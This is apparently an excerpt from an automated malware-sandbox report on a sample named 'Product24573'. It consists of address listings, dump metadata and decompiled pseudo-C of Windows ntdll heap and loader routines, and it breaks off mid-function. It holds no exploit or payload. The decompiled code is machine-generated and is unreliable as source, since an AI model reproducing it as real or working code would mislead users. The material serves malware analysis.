                                          0x01161515
                                          0x01161515
                                          0x01161518
                                          0x01161518
                                          0x01161513
                                          0x01161521
                                          0x01161525
                                          0x0116152a
                                          0x0116152d
                                          0x01161530
                                          0x01161532
                                          0x01161539
                                          0x0116153d
                                          0x0116155d
                                          0x01161562
                                          0x0116153f
                                          0x01161555
                                          0x0116155a
                                          0x01161570
                                          0x01161577
                                          0x0116157c
                                          0x01161582
                                          0x01161585
                                          0x01161589
                                          0x0116158b
                                          0x01161592
                                          0x01161593
                                          0x01161593
                                          0x01161589
                                          0x01161530
                                          0x00000000
                                          0x011614f8
                                          0x011614d5
                                          0x011614da
                                          0x011614dc
                                          0x00000000
                                          0x011614de
                                          0x011614e8
                                          0x00000000
                                          0x011614e8
                                          0x01161497
                                          0x01161497
                                          0x011614a4
                                          0x011614a4
                                          0x011614a7
                                          0x011614a9
                                          0x011614ab
                                          0x011614ab
                                          0x0116149c
                                          0x0116149e
                                          0x011614a0
                                          0x011614b0
                                          0x011614b0
                                          0x00000000
                                          0x011614a2
                                          0x011614a2
                                          0x00000000
                                          0x011614a2
                                          0x011614a0
                                          0x011614b3
                                          0x011614bb
                                          0x00000000
                                          0x011614bb
                                          0x01161495
                                          0x01119a7c
                                          0x01119a7c
                                          0x01119a7f
                                          0x01119a7f
                                          0x01119a82
                                          0x01119a84
                                          0x01119a87
                                          0x01119a8a
                                          0x01119a8d
                                          0x01119a8f
                                          0x0116166a
                                          0x0116166a
                                          0x0116166b
                                          0x01161674
                                          0x00000000
                                          0x01161674
                                          0x01119a95
                                          0x01119a97
                                          0x00000000
                                          0x00000000
                                          0x01119aa0
                                          0x01119aa3
                                          0x01119aa9
                                          0x01119aab
                                          0x01119ad7
                                          0x01119ad7
                                          0x01119ada
                                          0x01119add
                                          0x01119adf
                                          0x01119ae2
                                          0x01119ae6
                                          0x01119b22
                                          0x01119b27
                                          0x01119b29
                                          0x00000000
                                          0x01119b2b
                                          0x011615be
                                          0x00000000
                                          0x011615be
                                          0x01119b29
                                          0x01119ae8
                                          0x01119ae8
                                          0x01119aeb
                                          0x01119aee
                                          0x011615cb
                                          0x011615d2
                                          0x011615d5
                                          0x011615d7
                                          0x011615da
                                          0x011615dc
                                          0x011615dc
                                          0x011615dc
                                          0x011615da
                                          0x011615e5
                                          0x011615e9
                                          0x011615ee
                                          0x011615f1
                                          0x011615f3
                                          0x011615f9
                                          0x01161600
                                          0x01161604
                                          0x01161624
                                          0x01161629
                                          0x01161606
                                          0x0116161c
                                          0x01161621
                                          0x01161637
                                          0x0116163e
                                          0x01161643
                                          0x01161649
                                          0x0116164c
                                          0x01161650
                                          0x01161656
                                          0x0116165d
                                          0x0116165e
                                          0x0116165e
                                          0x01161650
                                          0x011615f3
                                          0x01119af4
                                          0x01119af7
                                          0x01119afc
                                          0x01119b00
                                          0x01119b04
                                          0x01119b08
                                          0x01119b14
                                          0x011199fe
                                          0x01119a04
                                          0x01119a07
                                          0x00000000
                                          0x01119a29
                                          0x0116169c
                                          0x011616a0
                                          0x011616a5
                                          0x011616a9
                                          0x011616b5
                                          0x011616ba
                                          0x011616bc
                                          0x011616be
                                          0x011616c3
                                          0x011616c3
                                          0x011616bc
                                          0x011616c8
                                          0x011616cc
                                          0x0116181b
                                          0x0116181b
                                          0x0116181e
                                          0x0116181e
                                          0x01161821
                                          0x01161823
                                          0x01161826
                                          0x01161829
                                          0x0116182c
                                          0x0116182e
                                          0x01161688
                                          0x01161688
                                          0x01161689
                                          0x0116168b
                                          0x0116168c
                                          0x0116168d
                                          0x0116168f
                                          0x01161692
                                          0x00000000
                                          0x01161692
                                          0x01161834
                                          0x01161836
                                          0x00000000
                                          0x00000000
                                          0x0116183f
                                          0x01161842
                                          0x01161848
                                          0x0116184a
                                          0x01161875
                                          0x01161875
                                          0x01161878
                                          0x0116187b
                                          0x0116187d
                                          0x01161880
                                          0x01161884
                                          0x011618a7
                                          0x011618a7
                                          0x011618aa
                                          0x011618ad
                                          0x011618b6
                                          0x011618bd
                                          0x011618c0
                                          0x011618c3
                                          0x011618c5
                                          0x011618c8
                                          0x011618ca
                                          0x011618ca
                                          0x011618cd
                                          0x011618cd
                                          0x011618c8
                                          0x011618d5
                                          0x011618da
                                          0x011618df
                                          0x011618e2
                                          0x011618e5
                                          0x011618e7
                                          0x011618ee
                                          0x011618f2
                                          0x01161912
                                          0x01161917
                                          0x011618f4
                                          0x0116190a
                                          0x0116190f
                                          0x01161925
                                          0x0116192c
                                          0x01161931
                                          0x0116193a
                                          0x0116193e
                                          0x01161940
                                          0x01161947
                                          0x01161948
                                          0x01161948
                                          0x0116193e
                                          0x011618e5
                                          0x0116194f
                                          0x01161952
                                          0x01161956
                                          0x0116195d
                                          0x01161961
                                          0x0116196d
                                          0x00000000
                                          0x0116196d
                                          0x0116188a
                                          0x0116188f
                                          0x01161891
                                          0x00000000
                                          0x00000000
                                          0x0116189d
                                          0x00000000
                                          0x0116189d
                                          0x0116184c
                                          0x01161859
                                          0x01161859
                                          0x0116185c
                                          0x00000000
                                          0x00000000
                                          0x01161851
                                          0x01161853
                                          0x01161855
                                          0x01161865
                                          0x01161865
                                          0x01161866
                                          0x01161868
                                          0x01161870
                                          0x00000000
                                          0x01161870
                                          0x01161857
                                          0x01161857
                                          0x0116185e
                                          0x00000000
                                          0x011616d2
                                          0x011616d2
                                          0x011616d5
                                          0x011616d5
                                          0x011616d8
                                          0x011616da
                                          0x011616dd
                                          0x011616e0
                                          0x011616e3
                                          0x011616e5
                                          0x01161808
                                          0x01161808
                                          0x01161809
                                          0x01161812
                                          0x01161817
                                          0x01161817
                                          0x00000000
                                          0x01161817
                                          0x011616eb
                                          0x011616ed
                                          0x00000000
                                          0x00000000
                                          0x011616f6
                                          0x011616f9
                                          0x011616ff
                                          0x01161701
                                          0x0116172c
                                          0x0116172c
                                          0x0116172f
                                          0x01161732
                                          0x01161734
                                          0x01161737
                                          0x0116173b
                                          0x0116175e
                                          0x0116175e
                                          0x01161761
                                          0x01161764
                                          0x0116176d
                                          0x01161774
                                          0x01161777
                                          0x0116177a
                                          0x0116177c
                                          0x0116177f
                                          0x01161781
                                          0x01161781
                                          0x01161784
                                          0x01161784
                                          0x0116177f
                                          0x0116178c
                                          0x01161791
                                          0x01161796
                                          0x01161799
                                          0x0116179c
                                          0x0116179e
                                          0x011617a5
                                          0x011617a9
                                          0x011617c9
                                          0x011617ce
                                          0x011617ab
                                          0x011617c1
                                          0x011617c6
                                          0x011617dc
                                          0x011617e3
                                          0x011617e8
                                          0x011617ee
                                          0x011617f1
                                          0x011617f5
                                          0x011617f7
                                          0x011617fe
                                          0x011617ff
                                          0x011617ff
                                          0x011617f5
                                          0x0116179c
                                          0x00000000
                                          0x01161764
                                          0x01161741
                                          0x01161746
                                          0x01161748
                                          0x00000000
                                          0x00000000
                                          0x01161754
                                          0x00000000
                                          0x01161754
                                          0x01161703
                                          0x01161710
                                          0x01161710
                                          0x01161713
                                          0x00000000
                                          0x00000000
                                          0x01161708
                                          0x0116170a
                                          0x0116170c
                                          0x0116171c
                                          0x0116171c
                                          0x0116171d
                                          0x0116171f
                                          0x01161727
                                          0x00000000
                                          0x01161727
                                          0x0116170e
                                          0x0116170e
                                          0x01161715
                                          0x00000000
                                          0x01161715
                                          0x011616cc
                                          0x01119a45
                                          0x01119a45
                                          0x01119a0e
                                          0x01119a1c
                                          0x01119a23
                                          0x0116167e
                                          0x0116167f
                                          0x01161681
                                          0x01161683
                                          0x01161684
                                          0x00000000
                                          0x01161684
                                          0x00000000
                                          0x01119aad
                                          0x01119aad
                                          0x01119ab0
                                          0x01119ab3
                                          0x01119ab3
                                          0x01119ab6
                                          0x00000000
                                          0x00000000
                                          0x01119ab8
                                          0x01119aba
                                          0x01119abc
                                          0x01119ac8
                                          0x01119ac8
                                          0x00000000
                                          0x01119abe
                                          0x01119abe
                                          0x01119ac0
                                          0x00000000
                                          0x01119ac0
                                          0x01119abc
                                          0x01119ad2
                                          0x00000000
                                          0x01119ad2
                                          0x01119aab

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 6b6499bc7128bd608e5970783337b9a25d7bcf86fd1eb61d05075bae815261a0
                                          • Instruction ID: 7907c7724ce32274d117e30fa7d09232fd95eae5b7362e0572fb003855e12181
                                          • Opcode Fuzzy Hash: 6b6499bc7128bd608e5970783337b9a25d7bcf86fd1eb61d05075bae815261a0
                                          • Instruction Fuzzy Hash: BE220370600246AFEB2CCF2CC495B7ABBF9EF85704F188469E8958B346D736D880CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111B477 Relevance: 4.2, Strings: 3, Instructions: 405COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0111B477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x11ed360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E0111B8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E0113B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x11e8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E010FB150();
						} else {
							E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E010FB150();
						__eflags =  *0x11e7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E011B2073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x11e8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x11eb1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E01139730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E011BA80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E01139660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E011B138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E011AFA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E011BA80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E011BA80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E01117D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E011B1582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E01117D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E011B1582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E0111B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E0111BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E011BA80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                          0x0111b486
                                          0x0111b48a
                                          0x0111b48e
                                          0x0111b491
                                          0x0111b493
                                          0x0111b49a
                                          0x0111b49c
                                          0x0111b4a2
                                          0x0111b4a7
                                          0x0111b6fc
                                          0x0111b6fc
                                          0x0111b6b3
                                          0x0111b6c3
                                          0x0111b6c3
                                          0x0111b4b4
                                          0x0116294f
                                          0x01162951
                                          0x01162957
                                          0x0116295d
                                          0x01162961
                                          0x01162980
                                          0x01162985
                                          0x01162963
                                          0x01162978
                                          0x0116297d
                                          0x0116298b
                                          0x01162990
                                          0x01162995
                                          0x0116299d
                                          0x011629a1
                                          0x011629a2
                                          0x011629a2
                                          0x011629a7
                                          0x011629a7
                                          0x01162951
                                          0x0111b4ba
                                          0x0111b4ba
                                          0x0111b4bd
                                          0x0111b4c2
                                          0x0111b6d4
                                          0x0111b4c8
                                          0x0111b4c8
                                          0x0111b4c8
                                          0x0111b4cd
                                          0x0111b4d0
                                          0x0111b4d9
                                          0x0111b4df
                                          0x0111b4e2
                                          0x011629b7
                                          0x011629bd
                                          0x00000000
                                          0x0111b4e8
                                          0x0111b4e8
                                          0x0111b4ef
                                          0x0111b4fa
                                          0x0111b703
                                          0x0111b709
                                          0x0111b70b
                                          0x0111b711
                                          0x0111b711
                                          0x0111b70b
                                          0x0111b503
                                          0x0111b50c
                                          0x0111b511
                                          0x0111b514
                                          0x0111b519
                                          0x011629c5
                                          0x011629c7
                                          0x011629cc
                                          0x011629cd
                                          0x011629cf
                                          0x011629d0
                                          0x011629d2
                                          0x011629d7
                                          0x011629d9
                                          0x011629ee
                                          0x011629ee
                                          0x011629f4
                                          0x011629fa
                                          0x01162a01
                                          0x00000000
                                          0x01162a01
                                          0x011629db
                                          0x011629df
                                          0x00000000
                                          0x00000000
                                          0x011629e1
                                          0x011629e4
                                          0x00000000
                                          0x00000000
                                          0x011629e6
                                          0x011629e6
                                          0x0111b51f
                                          0x0111b51f
                                          0x0111b520
                                          0x0111b525
                                          0x0111b52b
                                          0x0111b52d
                                          0x0111b52e
                                          0x0111b530
                                          0x0111b535
                                          0x0111b53b
                                          0x0111b53d
                                          0x01162a07
                                          0x00000000
                                          0x01162a07
                                          0x0111b549
                                          0x0111b54e
                                          0x01162a12
                                          0x01162a15
                                          0x00000000
                                          0x00000000
                                          0x01162a24
                                          0x0111b559
                                          0x0111b55c
                                          0x01162a34
                                          0x01162a3b
                                          0x01162a4d
                                          0x01162a4d
                                          0x01162a3b
                                          0x0111b566
                                          0x0111b56b
                                          0x0111b56f
                                          0x0111b57b
                                          0x0111b582
                                          0x01162a57
                                          0x01162a5c
                                          0x01162a5c
                                          0x0111b582
                                          0x0111b58b
                                          0x0111b58e
                                          0x0111b592
                                          0x0111b596
                                          0x0111b599
                                          0x0111b59b
                                          0x0111b59e
                                          0x0111b5a3
                                          0x0111b5a6
                                          0x0111b5a9
                                          0x01162a66
                                          0x01162a67
                                          0x01162a73
                                          0x01162a78
                                          0x0111b5b8
                                          0x0111b5b8
                                          0x0111b5bb
                                          0x0111b5bd
                                          0x0111b5bd
                                          0x0111b5c4
                                          0x0111b5f7
                                          0x0111b5f7
                                          0x0111b600
                                          0x0111b606
                                          0x0111b60c
                                          0x0111b612
                                          0x0111b618
                                          0x0111b621
                                          0x0111b623
                                          0x0111b629
                                          0x0111b629
                                          0x0111b62c
                                          0x0111b62f
                                          0x0111b633
                                          0x0111b636
                                          0x0111b639
                                          0x0111b71d
                                          0x0111b720
                                          0x0111b736
                                          0x0111b660
                                          0x0111b660
                                          0x0111b662
                                          0x0111b665
                                          0x0111b66a
                                          0x0111b6e6
                                          0x0111b6e7
                                          0x0111b6ea
                                          0x0111b6ef
                                          0x01162ad1
                                          0x01162ad2
                                          0x01162ad8
                                          0x01162add
                                          0x01162add
                                          0x0111b6f5
                                          0x0111b6f5
                                          0x0111b672
                                          0x0111b675
                                          0x0111b67a
                                          0x01162ae5
                                          0x01162ae8
                                          0x00000000
                                          0x00000000
                                          0x01162af4
                                          0x01162afc
                                          0x00000000
                                          0x0111b680
                                          0x0111b680
                                          0x0111b680
                                          0x0111b685
                                          0x0111b687
                                          0x0111b68a
                                          0x01162b06
                                          0x01162b0c
                                          0x01162b13
                                          0x01162b1e
                                          0x01162b20
                                          0x01162b2b
                                          0x01162b2b
                                          0x01162b2b
                                          0x01162b34
                                          0x01162b45
                                          0x01162b45
                                          0x01162b13
                                          0x0111b696
                                          0x0111b69b
                                          0x0111b6a0
                                          0x01162b4f
                                          0x01162b52
                                          0x00000000
                                          0x00000000
                                          0x01162b61
                                          0x00000000
                                          0x0111b6a6
                                          0x0111b6a6
                                          0x0111b6a6
                                          0x0111b6a8
                                          0x0111b6ab
                                          0x01162b70
                                          0x01162b72
                                          0x01162b7d
                                          0x01162b7d
                                          0x01162b7d
                                          0x01162b86
                                          0x01162b97
                                          0x01162b97
                                          0x0111b6b1
                                          0x00000000
                                          0x0111b6b1
                                          0x0111b6a0
                                          0x0111b67a
                                          0x0111b722
                                          0x0111b722
                                          0x0111b655
                                          0x0111b65d
                                          0x00000000
                                          0x0111b5c6
                                          0x0111b5c6
                                          0x0111b5ce
                                          0x01162a83
                                          0x01162a97
                                          0x01162a97
                                          0x01162a9a
                                          0x00000000
                                          0x00000000
                                          0x01162a88
                                          0x01162a8a
                                          0x01162a8c
                                          0x01162a8f
                                          0x01162a92
                                          0x01162aa1
                                          0x01162aa1
                                          0x01162aa2
                                          0x01162aab
                                          0x01162ab0
                                          0x00000000
                                          0x01162ab0
                                          0x01162a94
                                          0x01162a94
                                          0x00000000
                                          0x01162a9c
                                          0x0111b5d4
                                          0x0111b5d4
                                          0x0111b5d6
                                          0x0111b5d9
                                          0x0111b5de
                                          0x0111b5e1
                                          0x0111b5e4
                                          0x01162ab8
                                          0x01162ab9
                                          0x01162ac4
                                          0x01162ac9
                                          0x0111b5f2
                                          0x0111b5f2
                                          0x0111b5f4
                                          0x0111b5f4
                                          0x00000000
                                          0x0111b5e4
                                          0x0111b5c4
                                          0x0111b554
                                          0x0111b554
                                          0x00000000
                                          0x0111b554

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: 923f8e842e386b8c9f0d702a7d2cb4c35190a8eb4516c09f638a4ee780301c0b
                                          • Instruction ID: ef6233e553f0c43ad79698f1281f477085a37675406c22310f745e4cf065f60a
                                          • Opcode Fuzzy Hash: 923f8e842e386b8c9f0d702a7d2cb4c35190a8eb4516c09f638a4ee780301c0b
                                          • Instruction Fuzzy Hash: 5DE1CA30A042069FDB2DCF68C894BBEBBB5FF48304F1481A9E4029B795D771E981CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01108794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E01108794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0110934A() != 0) {
								_t159 = E0117A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x11e5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01175510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x11e5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0110849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01108999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
